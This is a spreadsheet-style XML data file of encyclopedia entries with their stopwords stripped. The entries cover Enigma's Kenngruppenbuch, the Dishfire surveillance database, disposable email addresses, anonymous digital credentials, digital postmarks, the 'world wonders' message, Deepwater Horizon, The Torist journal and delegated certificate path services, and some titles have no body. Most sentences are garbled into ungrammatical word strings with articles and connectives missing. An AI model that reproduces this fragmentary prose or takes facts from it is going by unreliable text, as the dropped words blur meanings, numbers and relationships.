    <t>discriminant book (german: kenngruppenbuch; literally: groups identify receiver) shortened k-book buch), also known indicator group book identification group book secret distribution list booklet form, listed trigraphs random order. kenngruppenbuch introduced 1937, used kriegsmarine (german navy) world part naval enigma message encipherment procedure, ensure secret confidential communication karl dönitz, commander submarines (bdu) atlantic mediterranean operating german submarines. kenngruppenbuch used generation enigma message transmitted within message indicator. kenngruppenbuch used october 1941, enigma model february 1942 exclusively enigma must confused kenngruppenheft used short signal book (german: kurzsignalbuch). history kenngruppenbuch large document first edition coming force 1938, mostly remained unchanged second edition released 1941. zuteilungsliste, however, continually updated. after 1937, kriegsmarine stopped using indicating system repetition message within indicator, serious security flaw, still used luftwaffe (german airforce) heer (german army) beginning 1940, making naval enigma secure. introduction book designed avert serious security flaw. 1941, version book recovered u-boat u-110, joan clarke, compatriots section bletchley park tasked solving german naval (kriegsmarine) enigma messages, noticed german telegraphists acting random way, supposed making message indicator. rather selecting random trigram book, telegraphist tendency choose trigram either column list, near bottom grouped middle. problem kriegsmarine later corrected introduction rules, later 1941. design kenngruppenbuch consisted main parts. first half consisted column list (german:spaltenliste) consisted 17,576 trigrams (kenngruppen), divided numbered columns trigrams displayed random order. second half consists group list (german:gruppenlist) trigrams sorted alphabetical order. after trigram numbers, first giving number column spaltenliste trigram occurs, second giving position trigram column. table pointer, table selection chart (german:tauschtafelplan) told operator column given table used select required trigrams. means assignation list (german:zuteilungsliste) told radio table particular cipher net. large keys would given several blocks columns, small keys naval enigma operation naval enigma used indicator define mechanism, transmitted along ciphertext. starting position rotors transmitted ciphertext, usually enciphered naval enigma. exact method used termed indicator procedure. properly self-reciprocal bipartite digraphic encryption algorithm used super-encipherment indicators (german:spruchschlüssel) basic wheel settings enigma cipher keys called heimische gewässer (english codename: dolphin), (plaice), triton (shark), niobe (narwhal) sucker used kenngruppenbuch bigram tables build indicator. indicator built follows: trigrams chosen random. first trigraph taken identification group table (german:schlüsselkenngruppe), kenngruppenbuch determined zuteilungsliste. second trigraph taken encryption indicator group process characteristic groups table (german:verfahrenkenngrupp),also taken kenngruppenbuch also determined zuteilungsliste.for example: arranged scheme:∗ empty position would filled random letter:x encipherment bigram table called double-letter conversion table (german:doppelbuchstabentauschtafel), arranged vertical pairs, follow: would give this read vertically, giving: vigf vtxt sent without encoding, preceding encrypted message. message sent morse receiving procedure reversed. nine bigram tables known exist, including fluss flusz (english:river)). other bigram booklets existed used including bach (1940), strom (1941) teich, ufer etc. also short weather cipher short signal book references further reading arthur bauer: direction finding allied weapon german submarines 1939 1945. selbstverlag, diemen netherlands 1997. isbn 3-00-002142-6 friedrich bauer decrypted secrets. methods maxims cryptology. revised expanded edition. springer, berlin others 2000 isbn 3-540-67931-6 rijmenants, dirk (2010). "enigma message procedures used army, force navy". cryptologia. (4): 329–339. doi:10.1080/01611194.2010.486257. s2cid 27996390.</t>
  </si>
  <si>
    <t>Dishfire</t>
  </si>
  <si>
    <t>dishfire (stylised dishfire) covert global surveillance collection system database united states america's national security agency (nsa) united kingdom's government communications headquarters (gchq) collects hundreds millions text messages daily basis around world. related analytic tool known prefer. details database operated following agencies: united states america national security agency (nsa) united kingdom government communications headquarters (gchq) existence database revealed 2014 based documents disclosed whistleblower edward snowden. according snowden's documents, britain's government communications headquarters (gchq) given full access dishfire database, agency uses obtain personal information britons exploiting legal loophole. scope surveillance each day, dishfire collects following amounts data: geolocation data 76,000 text messages travel information over 110,000 names, gathered electronic business cards over 800,000 financial transactions either gathered text-to-text payments linking credit cards phone users details million border crossings based interception network roaming alerts over million missed call alerts about million text messages around worldthe press highlighted quotes internal presentations highlighting intent operation: leaked gchq document said dishfire “collects pretty much everything can, selector targeted.” bulk collection therefore suggested document “particularly useful development targets, since possible examine content messages sent months even years target known interest.” (emphasis original) response, spokeswoman describes database follows: "dishfire system processes stores lawfully collected data. because data persons times incidentally collected nsa’s lawful foreign intelligence mission, privacy protections persons exist across entire process concerning use, handling, retention dissemination data dishfire." data processing dishfire typically exploited analytical tool known prefer program (stylised prefer), processes messages extract information including contacts missed call alerts, location roaming travel alerts, financial information bank alerts payments, names electronic business cards. reactions vodafone representative declared breaking news story channel “it’s first we’ve heard naturally we’re shocked surprised.” went dishfire probably circumventing law. according channel geoff white, "the dishfire system gives gchq legal loophole information without needing ripa request. that's text messages gathered stored gchq's access foreign intelligence agencies' stash data covered law." former interception commissioner swinton thomas drew analogy method circumventing interception laws torture foreign country, adding “different area course, concept similar”. gallery also fascia (database) five eyes mass surveillance mass surveillance united kingdom mass surveillance united states muscular, another nsa–gchq collaboration targeting google yahoo private cloud traffic stateroom (surveillance program) references</t>
  </si>
  <si>
    <t>Disposable email address</t>
  </si>
  <si>
    <t>disposable email addressing, also known dark mail, refers approach involves unique email address used every contact, entity, limited number times uses. benefit anyone compromises address utilizes connection email abuse, address owner easily cancel "dispose" without affecting contacts. uses disposable email addressing sets different, unique email address every sender/recipient combination. operates usefully scenarios someone sell release email address spam lists unscrupulous entities. common situations type involve online registration sites offering discussion groups, bulletin boards, chat rooms, online shopping, file hosting services. time email spam become everyday nuisance, identity theft threatens, deas serve convenient tool protecting internet users.disposable email addresses cancelled someone starts address manner intended creator. examples accidental release email spam list, address procured spammers. alternatively, user simply decide receive correspondence sender. whatever cause, allows address owner take unilateral action simply cancelling address question. later, owner determine whether update recipient not. disposable email addresses typically forward real email mailboxes owner receives reads messages. contact shared never learns real email address user. database manages dea, also quickly identify expected sender message retrieving associated contact name unique dea. used properly, also help identify recipients handle email addresses careless illegitimate manner. moreover, serve tool spotting fake messages phishers. advantages traditional email ideally, owners share contact/entity. thus, ever change, entity needs updated. comparison, traditional practice giving email address multiple recipients means address subsequently changes, many legitimate recipients need receive notification change update records potentially tedious process. additionally, access narrowed contact, entity becomes likely point compromise spam account receives (see "filtering" exceptions). this allows users determine firsthand trustworthiness people share deas. "safe" deas abused forwarded real email account, messages sent "compromised" deas routed special folder, sent trash, held spam filtering, returned undeliverable deleted outright. further, deas serve layer indirection sender recipient, user's actual email address changes, instance moving university address local isp, user need update service provider change, outstanding deas continue function without updating. using "sub-addressing" number email systems support "sub-addressing" (also known "plus" "tagged" addressing) appended "local part" email address part left modified address alias unmodified address. example, address joeuser+tag@example.com denotes delivery address joeuser@example.com. text used apply filtering, create single-use addresses. available, feature allow users create disposable addresses. multiple email aliases another approach register main email address many auxiliary email addresses, forward mail main address, i.e., auxiliaries used aliases main address. advantage approach user easily detect auxiliary email 'leaking' spam block dispose some services require additional time forwarding, others allow create addresses fly" without registering service advance. however, method allows storage access emails single main account, although manage forwarding services user remember password alias. variation catch-all address, forward real mailbox using wildcards. many mail servers allow asterisk (*), meaning "any number characters". this makes whitelist automatic requires administrator update blacklist occasionally. effect, user address, contains wild cards, e.g., "me.*@my.domain'", match incoming address starts "me." ends "@my.domain". this similar notation, even less obvious, since address appears completely normal. concerns restrictions site administrators some forum wiki administrators dislike deas obfuscate identity members make maintaining member control difficult. example, internet trolls, vandals users banned throwaway email addresses around ban. using provider makes easier; convenience person create filter spam also applies trolls. website operators expecting generate revenue selling user email addresses gather choose deas well, market value addresses. there several free lists available help detect domains, well managed services. banning deas might effective deterring undesirable users. more effective techniques controlling undesirables without inconveniences legitimate users might include: recognizing legitimate deas (they usually proper domain fixed prefix suffix), distinguishing short-lived, random throwaway address patterns domains used undesirables, wildcard banning. kind threat defense measures, attempts thwart deas foolproof filtering method bound result false positives (legitimate users getting banned), false negatives (undesirables getting through, legitimate users managing come pattern getting around limitations imposed site administrators). this email address partly fully defined user, made appear "permanent"-looking needed, made avoid particular pattern, defeating filtering intents purposes different permanent one, despite limited purpose. caught crossfire internet undesirables administrative user attempts deal them, providers trouble presenting total solution. user find necessary come conventional-looking email address create separate mailbox worst case) public/commercial entity required. there always uncertainty trustworthiness reputation site administrators, availability options hide email addresses, existence/enforcement acceptable privacy policy chance site compromised transferred owners. even largest otherwise reputable companies compromised resorted sending spam giving away emails third parties. human correspondent's computer mailbox compromised malware address book stolen sold spammers. also guerrilla mail references</t>
  </si>
  <si>
    <t>DigixDAO</t>
  </si>
  <si>
    <t>Deep packet inspection</t>
  </si>
  <si>
    <t>Digital credential</t>
  </si>
  <si>
    <t>digital credentials digital equivalent paper-based credentials. just paper-based credential could passport, driver's license, membership certificate kind ticket obtain service, cinema ticket public transport ticket, digital credential proof qualification, competence, clearance attached person. also, digital credentials prove something owner. both types credentials contain personal information person's name, birthplace, birthdate, and/or biometric information picture finger print. because still evolving, sometimes conflicting, terminologies used fields computer science, computer security, cryptography, term "digital credential" used quite confusingly fields. sometimes passwords means authentication referred credentials. operating system design, credentials properties process (such effective uid) used determining access rights. occasions, certificates associated material stored pkcs#12 pkcs#15 referred credentials. digital badges form digital credential indicate accomplishment, skill, quality interest. digital badges earned variety learning environments. digital cash money usually seen qualification attached specific person token money taken value own. digital assets like digital cash easily copied. consequently, digital cash protocols make extra effort avoid double spending coins. credentials proof qualification attached person. e-coins given individuals, cannot pass others, spend merchants. long spend coin once, anonymous, spend coin twice, become identifiable appropriate actions taken bank. this commonality, binding individual, digital cash digital credentials share many commonalities. fact implementations anonymous digital credential also realize digital cash. anonymous main idea behind anonymous digital credentials users given cryptographic tokens allow prove statements relationships public private organizations anonymously. this seen privacy-friendly alternative keeping using large centralized linkable user records. anonymous digital credentials thus related privacy anonymity. paper world analogues personalized, non-anonymous credentials are: passports, driving licenses, credit cards, health insurance cards, club membership cards etc. these contain name owner authenticating information signature, photograph, stop used anyone rightful owner. paper world analogues anonymous credentials are: money, train tickets, game-arcade tokens. these personally identifying information consequently transferred users without issuers relying parties aware this. credentials issued organizations ascertain authenticity information provided verifying entities demand. order investigate certain privacy specific properties credentials, take detailed look kind 'credentials', physical money credit cards. without doubt provide adequate information payment transactions. however amount quality information disclosed varies. money protected forgery physical properties. beyond that, little information revealed: coins feature ingrained value year coining; addition bank notes contain unique serial number order provide traceability required enforcement. hand, credit card, whose main purpose similar money, allows creation highly detailed records card owner. credit cards therefore privacy protecting. main privacy advantage money users remain anonymous. there however security usability properties make real world cash popular. credentials used national identification system also especially privacy relevant. such passport, driver's license, type card usually contains essential personal information. certain situations advantageous reveal parts information contained e.g., lower limit person's fact person capable driving car. pseudonyms original anonymous credential system proposed david chaum sometimes also referred pseudonym system. this stems fact credentials system obtained shown organizations using different pseudonyms cannot linked. introduction pseudonyms useful extension anonymity. pseudonyms allow users choose different name organization. while pseudonyms allow organizations associate users accounts, organizations cannot determine real identities customers. nevertheless, using anonymous credential, certain statements relationship user organization, pseudonym, proven another organization knows user different pseudonym. history anonymous credential systems related concept untraceable anonymous payments. important work, chaum presents cryptographic primitive, blind signature protocols. scheme signer neither learns message signs, signature recipient obtains message. blind signatures important building block many privacy-sensitive applications, anonymous payments, voting, credentials. original idea anonymous credential system derived blind signatures, relied trusted party credential transfer—the translation pseudonym another. blind signature scheme introduced chaum based signatures based discrete logarithm problem used constructing anonymous credential systems. stefan brands generalized digital credentials secret-key certificate based credentials, improving chaum's basic blind-signature based system discrete logarithm strong assumption settings. brands credentials provide efficient algorithms privacy unconditional commercial security setting, along several features proof non-membership blacklist.another credential form adds feature anonymous credentials: multi-show unlinkability. these group signature related credentials camenisch introduction group signatures opened possibility multi-show unlinkable showing protocols. while blind signatures highly relevant electronic cash one-show credentials, cryptographic primitive, called group signature, opened possibilities construction privacy enhancing protocols. observed article, group signatures bear resemblance chaum's concept credential systems.using group signature scheme, members group sign message respective secret keys. resulting signature verified everyone knows common public key, signature reveal information signer except member group. usually exists another entity called group manager, reveal exact identity signer, handles adding users removal users group—usually issuing revoking group membership certificates. anonymity, unlinkability, anonymity revocation provided group signatures lends variety privacy sensitive applications like voting, bidding, anonymous payment, anonymous credentials efficient constructions group signatures given ateniese, camenisch, joye, tsudik. efficient multi-show unlinkable anonymous credential systems—the latter essentially profile version idemix—are based similar ideas. this particularly true credential systems provide efficient means implementing anonymous multi-show credentials credential revocation.both schemes based techniques proofs knowledge. proofs knowledge relying discrete logarithm problem groups known order special problem groups hidden order form basis today's group signature anonymous credential systems. moreover, direct anonymous attestation protocol authenticating trusted platform modules based techniques. direct anonymous attestation seen first commercial application multi show anonymous digital credentials, even though case credentials attached persons, chips consequently computer platforms. from applications' point view, main advantage camenisch al.'s multi-show unlinkable credentials efficient brands credentials multi-show unlinkable property. however, property mainly practical interest off-line setting. brands credentials provide mechanism gives analogous functionality without sacrificing performance: efficient batch issuing protocol simultaneously issue many unlinkable credentials. this mechanism combined privacy preserving certificate refresh process (which gives fresh unlinkable credential attributes previous spent credential). online credentials learning online credentials learning digital credentials offered place traditional paper credentials skill educational achievement. directly linked accelerated development internet communication technologies, development digital badges, electronic passports massive open online courses (moocs) direct bearing understanding learning, recognition levels pose direct challenge status quo. useful distinguish three forms online credentials: test-based credentials, online badges, online certificates. also sources this article incorporates text free content work. licensed cc-by-sa license statement/permission. text taken level-setting recognition learning outcomes: level descriptors twenty-first century, 129-131, keevey, james; chakroun, borhene, unesco. unesco. learn open license text wikipedia articles, please how-to page. information reusing text wikipedia, please terms use. references</t>
  </si>
  <si>
    <t>Digital Postmarks</t>
  </si>
  <si>
    <t>digital postmark (dpm) technology applies trusted time stamps issued postal operator electronic document, validates electronic signatures, stores archives non-repudiation data needed support potential court challenge guarantees certainty date time postmarking. this global standard renamed electronic postal certification mark (epcm) 2007 shortly iteration technology developed microsoft poste italiane. addition traditional postmarking technology integrity electronically postmarked item, meaning kind falsification tampering easily definitely detected. additionally, content confidentiality guaranteed since document certification carried without access reading postal operator. epcm eventually available international postal operators member countries willing compliant standard, thus granting interoperability certified communications postal operators. united states, postal service operates non-global standard called electronic postmark, although soon expected provide services utilizing epcm. providers united states, 2010, authentidate authorized usps provider. however, contract allowed expire. process electronic document created digital postmarking client software signs document locally signed document sent digital postmarking (dpm) service postmarking upon receipt, service first validates authenticity signature signature valid timestamp generated service counter-signature includes date time document, signature, validation results timestamp stored digital postmark non-repudiation database digital postmark receipt, including validation results timestamp, returned client software client software wraps original document receipt verify signature, local cryptographic verification quick check integrity full receipt even original document retrieved service using verify request parties later date compared receipt stored document. benefits digital postmarks fundamentally non-repudiation service supporting designed protect sanctity mail digital form: digital signature verification timestamping successfully verified signatures standalone timestamping encryption validation certificate trust chains storage archival non-repudiation evidence data required support subsequent challenges legal significance. addition federal state legislative frameworks, holds legal weight respect following legislation, established encourage people form sign contracts agreements electronically: government paperwork elimination (gpea), 1998 uniform electronic transaction (ueta), 1999 electronic signatures global national commerce (esign), 2000working current infrastructure, easy implement providing functionality even client-side software, provides automated functionality client software. additional benefits proactive differentiation "good" email spam phishing. improved service quality applying standards govern physical mail email. stronger authentication standards (sender dkim). compliance federal laws regulations. postal operator enforcement: mail fraud virtually non-existent physical mail legal framework vigorous efforts u.s. postal inspection service. digital postmarks legal recourse email fraud physical mail fraud. significant mailing cost reduction cents. applicable services digital postmark used variety business applications: signing forms documents delivery secure documents interpersonal messaging brief history dates development digital postmark: 1998–1999the usps canada post develop first digital postmark.1999the standards board begins process develop global technical standard (s43) digital postmark.2001a workshop hosted usps decides consistent visual image digital postmarks offered posts.2002usps launches digital postmark, "electronic postmark". development work standard completed. microsoft agrees define produce interface w2000/xp office 2000 2003 support digital postmark.2003the standards board formally adopts standard (see article). defined technical standard "s43 electronic postmark interface" approved standards board november 2003 technical standard postal industry. portugal’s postal service launches legally recognized digital postmarks service.2004the congress adopts proposal amend convention legally define digital postmark, formally recognizing optional postal service. september: legally defined postal service (see article) this makes optional postal service member countries, placing category express mail. definition provides international technological enforcement standards.2005adobe agrees support inclusion digital postmark. poste france develops s43-based digital postmark server. used early 2006.2006the standards board approves version standard s43, first enable cross-border global traffic using digital postmarks. january: approved regulation (see article). this regulation passed amendment letter mail regulation. every postal service regulation manages service regulates posts cooperate service. this makes easier assist member countries developing market worldwide digital postmark services. this regulation dramatically increased interest worldwide. poste italiane develops plug-in enable microsoft office users connect backend server, delivers digital postmarks comply upu’s technical standard.2007april: approved renaming digital postmark electronic postal certification mark epcm global usage recognizing great potential digital postmark, numerous postal administrations worldwide begun deploying dpm-based solutions. five postal services canada, france, italy, portugal united states developed digital postmark today. major software developers also working incorporate global standard popular applications used millions people worldwide. united states (first launched 1996; current released march 2003) france (first launch 1999) canada (launched quarter 2003) portugal (launched september 2003) italy (launched 2005 poste italiane posteitaliane.mail, posteitaliane.post) egypt (contracted provider quarter 2005) switzerland (contracted provider july 2005) brazil (contracted provider 2004) china (preparing launch) netherlands (preparing launch) united kingdom (preparing launch)the universal postal union (upu) identified trust services greatest opportunity global postal growth. specifically, identified digital postmark important trust service; providing excellent defense online fraud abuse. electronic postmarks united states postal service (usps) electronic postmark (epm©) proprietary variation digital postmark issued usps. introduced 1996 u.s. postal service service offering provides proof integrity authentication electronic transactions. through usps web-based service, third-party verify authenticity electronic content. this electronic proof, postmarked postal service, provides evidence support non-repudiation electronic transactions. designed deter detect fraudulent tampering altering electronic data. features usps wrote features electronic postmark are: content authentication web-based service (based upon american association guidelines) proves document authenticity timestamp accuracy detect prevent fraud. integrates easily existing applications standard-based interfaces. verify options include; local (self contained) centralized (internet based). verification free. encryption insuring privacy security communications. data stays private. service never access content requires modification transmission content. (only hash code file logged evidence authenticity.) legal environment usps listed laws relevant follows: u.s.c. §1343 wire fraud u.s.c. §2701 electronic communications privacy (ecpa) u.s.c. §2510 regarding electronic communications. definitions (17)electronic storage means temporary, intermediate storage wire electronic communication incident electronic transmission thereof storage communication electronic communication service purposes backup protection communication. u.s.c. §2710 regarding unlawful access stored electronic communications u.s.c. §1028, fraud related activity connection identification documents information u.s.c. §1029, fraud related activity connection access devices. additional other definitions digital postmark (dpm) also network security mechanism, developed penn state researchers ihab hamadeh george kesidis, identify region packet packets comes from. developed combat spam denial-of-service (virus) attacks isolating source attacks, still allowing "good" messages pass through. digital postmark works perimeter router marks packet border region-identifying data. also called "border router packet marking", uses obsolete unused portion packet place regional mark-up. when room exist portion packet, region information broken hashed subsequently retrievable way. also trusted timestamping usps references external links usps electronic postmark page usps site french post service portugal post service universal postal union homepage purchase s43-3 standard universal postal union postal technology center usps glossary postal terms (publication worldwide postal network figures, october 2006 article: marking process traces spammers, pirates hackers etsi specialist task force 318: registered emails</t>
  </si>
  <si>
    <t>The world wonders</t>
  </si>
  <si>
    <t>"the world wonders" phrase rose notoriety world appeared part decoded message sent fleet admiral chester nimitz, commander chief, u.s. pacific fleet admiral william halsey, height battle leyte gulf october 1944. words, intended without meaning, added security padding encrypted message hinder japanese attempts cryptanalysis, mistakenly included decoded text given halsey. halsey interpreted phrase harsh sarcastic rebuke, consequence dropped futile pursuit decoy japanese carrier task force, and, belatedly, reversed ships fruitless effort united states forces battle samar. encryption strategy encryption cyphers defeated easily guessed common patterns recognized messages. messages typically common intros salutations "dear" "sincerely" lead defeat cypher. remove common phrases start end, world navy would unique non-relevant padding phrases separated main text word characters. padding would added encoding stripped decoding. simple message like "halsey: come home. -cinpac" might become message love gibberish halsey: come home. cinpac zagrat zpqtrec" encrypted transmission. background october 1944, united states troops invaded island leyte part strategy aimed isolating japan resource-rich territory occupied south east asia, particular depriving forces industry vital supplies. imperial japanese navy (ijn) mobilized nearly remaining major naval vessels attempt defeat allied invasion. ensuing battle leyte gulf japanese intended ships commanded vice-admiral jisaburō ozawa, "northern force", lure main american covering forces away leyte, thus allowing main forces, "southern force" "center force", 18-inch gunned super-battleship yamato, largest powerful ship afloat, attack invasion force pincer movement. northern force would built around four aircraft carriers carrier division (zuikaku—the last survivor carriers attacked pearl harbor 1941—and light carriers zuihō, chitose, chiyoda), would aircraft trained aircrew, serving merely "bait".halsey, command mobile naval forces covering invasion's northern flank, fell ruse, convinced northern force constituted main japanese threat, proceeded northward pursuit carriers fleet powerful force battleships, designated task force this left landing beaches covered sixteen escort carriers aircraft fleet. morning 25th strong japanese force battleships slipped bernardino strait headed toward american landing forces, prompting commander, admiral thomas kinkaid, send desperate plaintext message asking support. nimitz's message when nimitz, cincpac headquarters hawaii, kinkaid's plea help sent message halsey, simply asking current location task force previous misunderstanding, unclear: where repeat, task force thirty four? with addition metadata including routing classification information, well padding head tail, entire plaintext message encoded transmitted halsey was: turkey trots water from cincpac action third fleet info cominch seventy-seven where where task force thirty four world wonders u.s. navy procedure called padding added start message, vulnerable cryptanalysis common phrases words (such "yours sincerely") sections. words chosen padding obviously irrelevant actual message, however nimitz's enciphering clerk used phrase "[just] popped head". coincidentally, historians note "the world wonders" also present lord tennyson's poem "the charge light brigade" eponymous battle long odds fought exact years earlier.while decrypting transcribing message, halsey's radio officer properly removed leading phrase, trailing phrase looked appropriate seems thought intended left passing halsey, read where repeat, task force thirty four? world wonders. structure tagging (the 'rr's) made clear phrase fact padding. ships stations received message, decoder halsey's flagship, jersey, failed delete padding phrases. consequences message (and trailing padding) became infamous, created feeling, since appeared harsh criticism nimitz halsey's decision pursue decoy carriers leave landings uncovered. stunned struck face", halsey later recalled. "the paper rattled hands, snatched cap, threw deck, shouted something ashamed remember", letting anguished sob. radm robert carney, halsey's chief staff (who argued strongly favor pursuing carriers), witnessed halsey's emotional outburst reportedly grabbed shoulders shook him, shouting, "stop what hell's matter you? pull together!" recognizing failure, halsey ordered fleet south, however chase north exhausted fuel light escorts time wasted refueling taffy fighting life. halsey returned samar fastest battleships, three light cruisers eight destroyers, arrived late impact battle. references miller, nathan (1982) [1977]. navy: illustrated history. york: bonanza books. 366–71. isbn 0-517-38597-x. oclc 8493587.</t>
  </si>
  <si>
    <t>Deepwater Horizon</t>
  </si>
  <si>
    <t>deepwater horizon ultra-deepwater, dynamically positioned, semi-submersible offshore drilling owned transocean operated april 2010, drilling macondo prospect, blowout caused explosion killed crewmen ignited fireball visible miles away. fire inextinguishable and, days later, april, horizon sank, leaving well gushing seabed causing largest marine spill history.built 2001 south korea hyundai heavy industries, commissioned falcon later asset transocean), registered majuro, leased 2001 september 2013. september 2009, drilled deepest well history vertical depth 35,050 (10,683 measured depth 35,055 (10,685 tiber field keathley canyon block 102, approximately miles (400 southeast houston, 4,132 feet (1,259 water. design deepwater horizon fifth-generation, rbs-8d design (i.e. model type), deepwater, dynamically positioned, column-stabilized, semi-submersible mobile offshore drilling unit, designed drill subsea wells exploration production using 18.75 (476 mm), 15,000 (100,000 kpa) blowout preventer, (530 outside diameter marine riser.deepwater horizon second semi-submersible constructed class two, although deepwater nautilus, predecessor, dynamically positioned. (121 capable operating waters 8,000 feet (2,400 deep, maximum drill depth 30,000 (9,100 2010 approximately deepwater offshore rigs capable drilling waters deeper 5,000 (1,500 american bureau shipping (abs) class notations "a1, column stabilized drilling unit, ams, accu, dps-3".in 2002, upgraded "e-drill", drill monitoring system whereby technical personnel based houston, texas, received real-time drilling data transmitted maintenance troubleshooting information.advanced systems played role rig's operation, pressure drill monitoring technology, automated shutoff systems modelling systems cementing. opticem cement modelling system, used halliburton april 2010, played crucial part cement slurry support decisions. these decisions became focus investigations explosion month. history construction ownership deepwater horizon built falcon (which later became part transocean) hyundai heavy industries ulsan, south korea. construction started december 1998, keel laid march 2000, delivered february 2001, acquisition falcon transocean. until december 2004 registered republic panama.transocean, steinhausen, switzerland subsidiary triton asset leasing gmbh, operated marshallese flag convenience. leased 3-year contract deployment gulf mexico following construction. lease renewed 2004 year, 2005 years, 2009 years covering 2010 2013. last contract worth $544 million, $496,800 day, "bare rig", crew, gear support vessels estimated cost same.according falcon's filings 2001, transfer document falcon transocean dated august 2001, specified "official registration number 29273-pext-1, number 8764597, gross tonnage 32,588 tonnage 9,778" transfer value us$340 million. 2010, insured us$560 million covering replacement cost wreckage removal. drilling operations deepwater horizon worked wells atlantis 56%, 44%) thunder horse 75%, exxonmobil 25%) fields. described times "lucky" "celebrated" rig, 2007 still described "one powerful rigs world". 2006 discovered kaskida field, 2009 "giant" tiber field. well tiber field true vertical depth 35,050 (10,683 measured depth 35,055 (10,685 4,132 (1,259 water. well deepest well world, 5,000 feet (1,500 farther seabed rig's official drilling specification stated company's fleet list.in february 2010, deepwater horizon commenced drilling exploratory well macondo prospect (mississippi canyon block 252), miles southeast coast louisiana, water depth approximately 5,000 feet (1,500 macondo prospect exploration rights acquired 2009, prospect jointly owned (65%), anadarko petroleum (25%) moex offshore 2007 (10%). deepwater horizon still working macondo site april 2010, violent explosion occurred leading destruction subsequent spill. this spill recorded largest offshore spill occur date, resulting miles coastal pollution. well final stages completion cement emplaced last casing string. exploratory work described "concluded" permission already requested terminate operations macondo site. scheduled move next roles semi-permanent production platforms, initially tiber site followed return kaskida field, dome miles coast louisiana.during operational lifetime, actively operation working life (2,896 3,131 days). remainder partly time spent moving sites. regulation, safety, inspection minerals management service (renamed june 2010 bureau ocean energy management, regulation enforcement, bureau ocean energy (boe)) regulatory inspecting body offshore drilling rigs united states america. according associated press investigation, certain safety documentation emergency procedure information, including documentation exact incident later occurred, absent. exact number required monthly inspections performed varied time; inspections carried required first months, around inspections omitted, although investigation notes partly expected, since circumstances weather movement preclude inspection. reports last three inspections 2010 provided freedom information legislation. each inspections taken hours less.during lifetime received citations non-compliance, 2002 (safety, including blowout preventer) 2003 (pollution). sixth citation 2007 related non-grounded electrical equipment later withdrawn equipment determined compliant regulations. overall deepwater horizon's safety record "strong" according drilling consultant reviewing information. 2009 minerals management service "herald[ed] deepwater horizon industry model safety". according ap's investigation "its record exemplary, according officials, never inspectors' informal 'watch list' problem rigs". explosion spill 7:45 p.m. april 2010, final phases drilling exploratory well macondo, geyser seawater erupted marine riser onto rig, shooting air. this soon followed eruption slushy combination drilling mud, methane gas, water. component slushy material quickly transitioned fully gaseous state ignited series explosions firestorm. attempt made activate blowout preventer, failed. final defense prevent spill, device known blind shear ram, activated failed plug well.eleven workers presumed killed initial explosion: aaron dale burkeen, philadelphia, mississippi; karl kleppinger jr., natchez, mississippi; dewey revette, state line, mississippi; shane roshto, liberty, mississippi; donald clark, newellton, louisiana; stephen curtis, georgetown, louisiana; gordon jones, baton rouge, louisiana; wyatt kemp, jonesville, louisiana; keith blair manuel, gonzales, louisiana; adam weise, yorktown, texas; jason anderson, midfield, texas. evacuated, injured workers airlifted medical facilities. after approximately hours, deepwater horizon sank april 2010. remains located resting seafloor approximately 1,500 deep location, northwest well.the resultant spill continued july closed cap. relief wells used permanently seal well, declared "effectively dead" september 2010. noaa established gulf spill restoration project, deep water horizon national resource damage assessment trustees, help restore much coastline. aftermath transocean received early partial insurance settlement total loss deepwater horizon us$401 million around 2010. financial analysts noted insurance recovery likely outweigh value (although necessarily replacement value) liabilities latter estimated us$200 million.litigation, ultimate roll call damage, scope final insurance recovery unknown june 2010, analysts reporting aftermath unprecedented scale complexity compared previous disasters took many years unfold resolve. july 2010 analysis financial times aftermath cited legal sources saying point scale litigation becomes large really novel", "the situation likely complicated variety probable cases means hard aggregate so-called class actions" historical context never faced anything like before". exxon valdez disaster, litigation discussed terms 20-year timescale.in january 2013, transocean agreed us$1.4 billion violations clean water act. earlier agreed $2.4 billion faced additional penalties could range billion billion. september 2014, halliburton agreed settle large percentage legal claims paying $1.1 billion trust three installments years. september 2014, u.s. district judge carl barbier ruled guilty gross negligence willful misconduct clean water (cwa). described bp's actions "reckless," said transocean's halliburton's actions "negligent." apportioned blame spill transocean, halliburton. issued statement strongly disagreeing finding, saying court's decision would appealed.on december 2014, supreme court rejected bp's legal challenge compensation deal 2010 gulf mexico spill. settlement agreement cap, initially estimated would roughly $7.8bn (£6.1bn) compensate victims. also ixtoc spill ocean ranger piper alpha tony hayward references external links transocean official website deepwater horizon detail transocean's website rigzone.com photograph deepwater horizon 2004 geographic.org griffitt, michelle. "initial exploration plan mississippi canyon block ocs-g 32306" (pdf). exploration production. orleans, louisiana: minerals management service. archived original (pdf) july 2010. washburn, mark 2010). huff boom ended deepwater horizon's good luck". mcclatchy company. archived original june 2010. retrieved june 2010. detailed media description events deepwater horizon explosion (yahoo news mirror) photo history fire loss boem reading room deepwater horizon, including freedom information publications video explaining events leading deepwater horizon explosion affected region.</t>
  </si>
  <si>
    <t>The Torist</t>
  </si>
  <si>
    <t>torist literary journal first released late 2015, published anonymity network. features short stories, essays poetry. reasons publishing return idea rummaging antiquarian shops gets back time find evergreen review stacks vintage bookstore" zine accessed tor, dark site. founders pseudonymous g.m.h., named reclusive 19th-century poet gerard manley hopkins, prof. robert gehl, communication professor focusing media university utah. dark-net social network galaxy, started collaborating 2014, taking years produce first issue journal. submissions made anonymous open-source globaleaks platform intended whistleblowing. founders hope anonymity bolster creativity among submissions, wish show anonymity online illicit activities. entries first issue named, including acclaimed poet alissa quart well authors vance osterhout, linda kronman, andreas zingerle, nathanel bassett, peter conlin, porup.the torist designed throw spanner works various attempts smear anonymity desirable evil people entries also gravitated towards issues concerning modern internet, prolific advertising, surveillance, censorship, edward snowden. 2016 entries accepted second edition magazine/journal, non-paid basis, allowing also anonymous entries. content torist published creative commons license. references external links tumblr blog</t>
  </si>
  <si>
    <t>Delegated Path Discovery</t>
  </si>
  <si>
    <t>delegated path discovery (dpd) method querying trusted server information public certificate. allows clients obtain collated certificate information trusted server. this information used client validate subject certificate. requirements described 3379. also delegated path validation scvp</t>
  </si>
  <si>
    <t>Delegated Path Validation</t>
  </si>
  <si>
    <t>delegated path validation (dpv) method offloading trusted server work involved validating public certificate. combining certificate information supplied client certificate path revocation status information obtained itself, server able apply complex validation policies prohibitive client perform. requirements described 3379. also delegated path discovery</t>
  </si>
  <si>
    <t>The Spamhaus Project</t>
  </si>
  <si>
